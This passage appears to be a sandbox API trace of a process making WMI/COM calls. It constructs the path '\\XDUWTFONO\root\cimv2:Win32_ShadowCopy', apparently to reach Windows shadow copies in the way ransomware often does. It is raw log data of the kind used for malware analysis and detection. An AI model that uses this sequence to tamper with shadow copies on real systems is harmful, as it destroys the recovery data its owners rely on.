pToken=0x1c90bfe0) returned 0x0 [0108.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ed0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bfa0 | out: ppvObject=0x1c90bfa0*=0x1b92cfc0) returned 0x0 [0108.811] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92cfc0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90bfd0 | out: pCid=0x1c90bfd0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.811] WbemDefPath:IUnknown:Release (This=0x1b92cfc0) returned 0x3 [0108.811] CoGetContextToken (in: pToken=0x1c90bfb0 | out: pToken=0x1c90bfb0) returned 0x0 [0108.812] WbemDefPath:IUnknown:AddRef (This=0x1be44ed0) returned 0x4 [0108.812] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ed0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c0c8 | out: ppvObject=0x1c90c0c8*=0x0) returned 0x80004002 [0108.812] WbemDefPath:IUnknown:Release (This=0x1be44ed0) returned 0x3 [0108.812] WbemDefPath:IUnknown:Release (This=0x1be44ed0) returned 0x2 [0108.812] WbemDefPath:IUnknown:Release (This=0x1be41920) returned 0x0 [0108.812] WbemDefPath:IUnknown:Release (This=0x1be44ed0) returned 0x1 [0108.812] CoGetContextToken (in: pToken=0x1c90cce0 | out: pToken=0x1c90cce0) returned 0x0 [0108.812] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0108.812] WbemDefPath:IUnknown:AddRef (This=0x1be44ed0) returned 0x2 [0108.812] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ed0, riid=0x1c90cd60*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd40 | out: ppvObject=0x1c90cd40*=0x1be44ed0) returned 0x0 [0108.813] WbemDefPath:IUnknown:Release (This=0x1be44ed0) returned 0x2 [0108.813] WbemDefPath:IUnknown:Release (This=0x1be44ed0) returned 0x1 [0108.813] CoGetContextToken (in: pToken=0x1c90ce60 | out: pToken=0x1c90ce60) returned 0x0 [0108.813] CoGetContextToken (in: pToken=0x1c90cda0 | out: pToken=0x1c90cda0) returned 0x0 [0108.813] WbemDefPath:IUnknown:AddRef (This=0x1be44ed0) returned 0x2 [0108.813] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ed0, riid=0x1c90cee0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cec0 | out: ppvObject=0x1c90cec0*=0x1be44ed0) returned 0x0 [0108.813] WbemDefPath:IUnknown:Release (This=0x1be44ed0) returned 0x2 [0108.813] WbemDefPath:IUnknown:AddRef (This=0x1be44ed0) returned 0x3 [0108.813] WbemDefPath:IWbemPath:SetText (This=0x1be44ed0, uMode=0x4, pszPath="") returned 0x0 [0108.813] WbemDefPath:IUnknown:Release (This=0x1be44ed0) returned 0x2 [0108.813] CoGetObjectContext (in: riid=0x1c90d088*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d080 | out: ppv=0x1c90d080*=0x142498) returned 0x0 [0108.813] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d0a0 | out: pAptType=0x1c90d0a0*=1) returned 0x0 [0108.813] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d1a8 | out: ppvObject=0x1c90d1a8*=0x0) returned 0x80004002 [0108.814] IUnknown:Release (This=0x142498) returned 0x1 [0108.814] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c710 | out: ppv=0x1c90c710*=0x1be41920) returned 0x0 [0108.814] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41920, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c420 | out: ppvObject=0x1c90c420*=0x0) returned 0x80004002 [0108.814] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41920, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c408 | out: ppvObject=0x1c90c408*=0x1be44fd0) returned 0x0 [0108.815] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44fd0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c310 | out: ppvObject=0x1c90c310*=0x1be44fd0) returned 0x0 [0108.815] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44fd0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c390 | out: ppvObject=0x1c90c390*=0x0) returned 0x80004002 [0108.815] WbemDefPath:IUnknown:AddRef (This=0x1be44fd0) returned 0x3 [0108.815] CoGetContextToken (in: pToken=0x1c90bfe0 | out: pToken=0x1c90bfe0) returned 0x0 [0108.815] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44fd0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bfa0 | out: ppvObject=0x1c90bfa0*=0x1b92d000) returned 0x0 [0108.815] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92d000, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90bfd0 | out: pCid=0x1c90bfd0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.815] WbemDefPath:IUnknown:Release (This=0x1b92d000) returned 0x3 [0108.816] CoGetContextToken (in: pToken=0x1c90bfb0 | out: pToken=0x1c90bfb0) returned 0x0 [0108.816] WbemDefPath:IUnknown:AddRef (This=0x1be44fd0) returned 0x4 [0108.816] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44fd0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c0c8 | out: ppvObject=0x1c90c0c8*=0x0) returned 0x80004002 [0108.816] WbemDefPath:IUnknown:Release (This=0x1be44fd0) returned 0x3 [0108.816] WbemDefPath:IUnknown:Release (This=0x1be44fd0) returned 0x2 [0108.816] WbemDefPath:IUnknown:Release (This=0x1be41920) returned 0x0 [0108.816] WbemDefPath:IUnknown:Release (This=0x1be44fd0) returned 0x1 [0108.816] CoGetContextToken (in: pToken=0x1c90cce0 | out: pToken=0x1c90cce0) returned 0x0 [0108.817] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0108.817] WbemDefPath:IUnknown:AddRef (This=0x1be44fd0) returned 0x2 [0108.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44fd0, riid=0x1c90cd60*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd40 | out: ppvObject=0x1c90cd40*=0x1be44fd0) returned 0x0 [0108.817] WbemDefPath:IUnknown:Release (This=0x1be44fd0) returned 0x2 [0108.817] WbemDefPath:IUnknown:Release (This=0x1be44fd0) returned 0x1 [0108.817] CoGetContextToken (in: pToken=0x1c90ce60 | out: pToken=0x1c90ce60) returned 0x0 [0108.817] CoGetContextToken (in: pToken=0x1c90cda0 | out: pToken=0x1c90cda0) returned 0x0 [0108.817] WbemDefPath:IUnknown:AddRef (This=0x1be44fd0) returned 0x2 [0108.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44fd0, riid=0x1c90cee0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cec0 | out: ppvObject=0x1c90cec0*=0x1be44fd0) returned 0x0 [0108.817] WbemDefPath:IUnknown:Release (This=0x1be44fd0) returned 0x2 [0108.817] WbemDefPath:IUnknown:AddRef (This=0x1be44fd0) returned 0x3 [0108.818] WbemDefPath:IWbemPath:SetText (This=0x1be44fd0, uMode=0x4, pszPath="") returned 0x0 [0108.818] WbemDefPath:IUnknown:Release (This=0x1be44fd0) returned 0x2 [0108.818] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be44fd0, puCount=0x1c90d180 | out: puCount=0x1c90d180*=0x0) returned 0x0 [0108.818] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be44ed0, puCount=0x1c90d180 | out: puCount=0x1c90d180*=0x0) returned 0x0 [0108.818] WbemDefPath:IWbemPath:GetClassName (in: This=0x1be44fd0, puBuffLength=0x1c90d220*=0x0, pszName=0x0 | out: puBuffLength=0x1c90d220*=0x0, pszName=0x0) returned 0x8004103a [0108.818] WbemDefPath:IWbemPath:GetServer (in: This=0x1be44fd0, puNameBufLength=0x1c90d220*=0x0, pName=0x0 | out: puNameBufLength=0x1c90d220*=0x0, pName=0x0) returned 0x80041009 [0108.818] WbemDefPath:IWbemPath:SetServer (This=0x1be44fd0, Name="XDUWTFONO") returned 0x0 [0108.818] CoGetObjectContext (in: riid=0x1c90d088*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d080 | out: ppv=0x1c90d080*=0x142498) returned 0x0 [0108.818] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d0a0 | out: pAptType=0x1c90d0a0*=1) returned 0x0 [0108.818] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d1a8 | out: ppvObject=0x1c90d1a8*=0x0) returned 0x80004002 [0108.818] IUnknown:Release (This=0x142498) returned 0x1 [0108.819] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c710 | out: ppv=0x1c90c710*=0x1be41940) returned 0x0 [0108.819] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41940, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c420 | out: ppvObject=0x1c90c420*=0x0) returned 0x80004002 [0108.819] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41940, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c408 | out: ppvObject=0x1c90c408*=0x1be450d0) returned 0x0 [0108.819] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be450d0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c310 | out: ppvObject=0x1c90c310*=0x1be450d0) returned 0x0 [0108.819] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be450d0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c390 | out: ppvObject=0x1c90c390*=0x0) returned 0x80004002 [0108.820] WbemDefPath:IUnknown:AddRef (This=0x1be450d0) returned 0x3 [0108.820] CoGetContextToken (in: pToken=0x1c90bfe0 | out: pToken=0x1c90bfe0) returned 0x0 [0108.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be450d0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bfa0 | out: ppvObject=0x1c90bfa0*=0x1b92d040) returned 0x0 [0108.820] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92d040, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90bfd0 | out: pCid=0x1c90bfd0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.820] WbemDefPath:IUnknown:Release (This=0x1b92d040) returned 0x3 [0108.820] CoGetContextToken (in: pToken=0x1c90bfb0 | out: pToken=0x1c90bfb0) returned 0x0 [0108.820] WbemDefPath:IUnknown:AddRef (This=0x1be450d0) returned 0x4 [0108.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be450d0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c0c8 | out: ppvObject=0x1c90c0c8*=0x0) returned 0x80004002 [0108.821] WbemDefPath:IUnknown:Release (This=0x1be450d0) returned 0x3 [0108.821] WbemDefPath:IUnknown:Release (This=0x1be450d0) returned 0x2 [0108.821] WbemDefPath:IUnknown:Release (This=0x1be41940) returned 0x0 [0108.821] WbemDefPath:IUnknown:Release (This=0x1be450d0) returned 0x1 [0108.821] CoGetContextToken (in: pToken=0x1c90cce0 | out: pToken=0x1c90cce0) returned 0x0 [0108.821] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0108.821] WbemDefPath:IUnknown:AddRef (This=0x1be450d0) returned 0x2 [0108.821] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be450d0, riid=0x1c90cd60*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd40 | out: ppvObject=0x1c90cd40*=0x1be450d0) returned 0x0 [0108.821] WbemDefPath:IUnknown:Release (This=0x1be450d0) returned 0x2 [0108.822] WbemDefPath:IUnknown:Release (This=0x1be450d0) returned 0x1 [0108.822] CoGetContextToken (in: pToken=0x1c90ce60 | out: pToken=0x1c90ce60) returned 0x0 [0108.822] CoGetContextToken (in: pToken=0x1c90cda0 | out: pToken=0x1c90cda0) returned 0x0 [0108.822] WbemDefPath:IUnknown:AddRef (This=0x1be450d0) returned 0x2 [0108.822] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be450d0, riid=0x1c90cee0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cec0 | out: ppvObject=0x1c90cec0*=0x1be450d0) returned 0x0 [0108.822] WbemDefPath:IUnknown:Release (This=0x1be450d0) returned 0x2 [0108.822] WbemDefPath:IUnknown:AddRef (This=0x1be450d0) returned 0x3 [0108.822] WbemDefPath:IWbemPath:SetText (This=0x1be450d0, uMode=0x4, pszPath="root\\cimv2") returned 0x0 [0108.822] WbemDefPath:IUnknown:Release (This=0x1be450d0) returned 0x2 [0108.822] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be44fd0, puCount=0x1c90d180 | out: puCount=0x1c90d180*=0x0) returned 0x0 [0108.822] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be450d0, puCount=0x1c90d180 | out: puCount=0x1c90d180*=0x2) returned 0x0 [0108.822] WbemDefPath:IWbemPath:GetText (in: This=0x1be450d0, lFlags=16, puBuffLength=0x1c90d180*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d180*=0xb, pszText=0x0) returned 0x0 [0108.823] WbemDefPath:IWbemPath:GetText (in: This=0x1be450d0, lFlags=16, puBuffLength=0x1c90d180*=0xb, pszText="0000000000" | out: puBuffLength=0x1c90d180*=0xb, pszText="root\\cimv2") returned 0x0 [0108.823] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x1be44fd0) returned 0x0 [0108.823] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be450d0, puCount=0x1c90d1e0 | out: puCount=0x1c90d1e0*=0x2) returned 0x0 [0108.823] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be450d0, uIndex=0x0, puNameBufLength=0x1c90d1e0*=0x0, pName=0x0 | out: puNameBufLength=0x1c90d1e0*=0x5, pName=0x0) returned 0x0 [0108.823] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be450d0, uIndex=0x0, puNameBufLength=0x1c90d1e0*=0x5, pName="0000" | out: puNameBufLength=0x1c90d1e0*=0x5, pName="root") returned 0x0 [0108.823] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1be44fd0, uIndex=0x0, pszName="root") returned 0x0 [0108.823] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be450d0, uIndex=0x1, puNameBufLength=0x1c90d1e0*=0x0, pName=0x0 | out: puNameBufLength=0x1c90d1e0*=0x6, pName=0x0) returned 0x0 [0108.823] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be450d0, uIndex=0x1, puNameBufLength=0x1c90d1e0*=0x6, pName="00000" | out: puNameBufLength=0x1c90d1e0*=0x6, pName="cimv2") returned 0x0 [0108.823] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1be44fd0, uIndex=0x1, pszName="cimv2") returned 0x0 [0108.824] WbemDefPath:IWbemPath:GetClassName (in: This=0x1be44fd0, puBuffLength=0x1c90d220*=0x0, pszName=0x0 | out: puBuffLength=0x1c90d220*=0x0, pszName=0x0) returned 0x8004103a [0108.824] WbemDefPath:IWbemPath:SetClassName (This=0x1be44fd0, Name="Win32_ShadowCopy") returned 0x0 [0108.826] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be44fd0, puCount=0x1c90d270 | out: puCount=0x1c90d270*=0x2) returned 0x0 [0108.826] WbemDefPath:IWbemPath:GetText (in: This=0x1be44fd0, lFlags=4, puBuffLength=0x1c90d270*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d270*=0x28, pszText=0x0) returned 0x0 [0108.826] WbemDefPath:IWbemPath:GetText (in: This=0x1be44fd0, lFlags=4, puBuffLength=0x1c90d270*=0x28, pszText="000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d270*=0x28, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy") returned 0x0 [0108.827] WbemDefPath:IWbemPath:GetInfo (in: This=0x1be44fd0, uRequestedInfo=0x0, puResponse=0x1c90d290 | out: puResponse=0x1c90d290*=0x20c16) returned 0x0 [0108.827] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be44fd0, puCount=0x1c90d270 | out: puCount=0x1c90d270*=0x2) returned 0x0 [0108.827] WbemDefPath:IWbemPath:GetText (in: This=0x1be44fd0, lFlags=8, puBuffLength=0x1c90d270*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d270*=0x17, pszText=0x0) returned 0x0 [0108.827] WbemDefPath:IWbemPath:GetText (in: This=0x1be44fd0, lFlags=8, puBuffLength=0x1c90d270*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d270*=0x17, pszText="\\\\XDUWTFONO\\root\\cimv2") returned 0x0 [0108.827] WbemDefPath:IWbemPath:GetInfo (in: This=0x1be44fd0, uRequestedInfo=0x0, puResponse=0x1c90d290 | out: puResponse=0x1c90d290*=0x20c16) returned 0x0 [0108.827] CoGetObjectContext (in: riid=0x1c90d108*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d100 | out: ppv=0x1c90d100*=0x142498) returned 0x0 [0108.828] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d120 | out: pAptType=0x1c90d120*=1) returned 0x0 [0108.828] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d228 | out: ppvObject=0x1c90d228*=0x0) returned 0x80004002 [0108.828] IUnknown:Release (This=0x142498) returned 0x1 [0108.828] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c790 | out: ppv=0x1c90c790*=0x1be41a60) returned 0x0 [0108.828] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41a60, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c4a0 | out: ppvObject=0x1c90c4a0*=0x0) returned 0x80004002 [0108.828] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41a60, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c488 | out: ppvObject=0x1c90c488*=0x1be453a0) returned 0x0 [0108.829] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be453a0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c390 | out: ppvObject=0x1c90c390*=0x1be453a0) returned 0x0 [0108.829] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be453a0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c410 | out: ppvObject=0x1c90c410*=0x0) returned 0x80004002 [0108.829] WbemDefPath:IUnknown:AddRef (This=0x1be453a0) returned 0x3 [0108.829] CoGetContextToken (in: pToken=0x1c90c060 | out: pToken=0x1c90c060) returned 0x0 [0108.829] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be453a0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c020 | out: ppvObject=0x1c90c020*=0x1b92d1c0) returned 0x0 [0108.829] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92d1c0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90c050 | out: pCid=0x1c90c050*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.829] WbemDefPath:IUnknown:Release (This=0x1b92d1c0) returned 0x3 [0108.829] CoGetContextToken (in: pToken=0x1c90c030 | out: pToken=0x1c90c030) returned 0x0 [0108.829] WbemDefPath:IUnknown:AddRef (This=0x1be453a0) returned 0x4 [0108.829] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be453a0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c148 | out: ppvObject=0x1c90c148*=0x0) returned 0x80004002 [0108.830] WbemDefPath:IUnknown:Release (This=0x1be453a0) returned 0x3 [0108.830] WbemDefPath:IUnknown:Release (This=0x1be453a0) returned 0x2 [0108.830] WbemDefPath:IUnknown:Release (This=0x1be41a60) returned 0x0 [0108.830] WbemDefPath:IUnknown:Release (This=0x1be453a0) returned 0x1 [0108.830] CoGetContextToken (in: pToken=0x1c90cd60 | out: pToken=0x1c90cd60) returned 0x0 [0108.830] CoGetContextToken (in: pToken=0x1c90cca0 | out: pToken=0x1c90cca0) returned 0x0 [0108.830] WbemDefPath:IUnknown:AddRef (This=0x1be453a0) returned 0x2 [0108.830] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be453a0, riid=0x1c90cde0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, 